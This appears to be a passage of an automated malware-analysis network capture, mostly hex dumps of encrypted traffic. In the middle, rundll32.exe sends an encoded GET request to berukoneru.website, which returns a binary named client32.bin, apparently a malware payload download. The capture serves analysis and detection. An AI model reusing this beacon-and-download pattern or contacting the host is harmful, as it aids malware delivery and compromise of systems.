1a 34 bf 6c 83
                            Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                            2021-12-14 09:21:39 UTC940INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                            Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                            2021-12-14 09:21:39 UTC956INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                            Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                            2021-12-14 09:21:39 UTC972INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                            Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                            2021-12-14 09:21:39 UTC988INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                            Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                            2021-12-14 09:21:39 UTC1004INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                            Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                            2021-12-14 09:21:39 UTC1020INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                            Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                            2021-12-14 09:21:39 UTC1036INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                            Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                            2021-12-14 09:21:39 UTC1052INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                            Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                            2021-12-14 09:21:39 UTC1068INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                            Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                            2021-12-14 09:21:39 UTC1084INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                            Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                            2021-12-14 09:21:39 UTC1100INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                            Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            5 | 192.168.2.6 | 49817 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:39 UTC | 892 | OUT | GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC | 1101 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 268426
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=skjfg16fsrr25esl9k5i4c28l1; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC1102INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                            Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                            2021-12-14 09:21:39 UTC1117INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                            Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                            2021-12-14 09:21:39 UTC1133INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                            Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                            2021-12-14 09:21:39 UTC1149INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                            Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                            2021-12-14 09:21:39 UTC1165INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                            Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                            2021-12-14 09:21:39 UTC1181INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                            Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                            2021-12-14 09:21:39 UTC1197INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                            Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                            2021-12-14 09:21:39 UTC1213INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 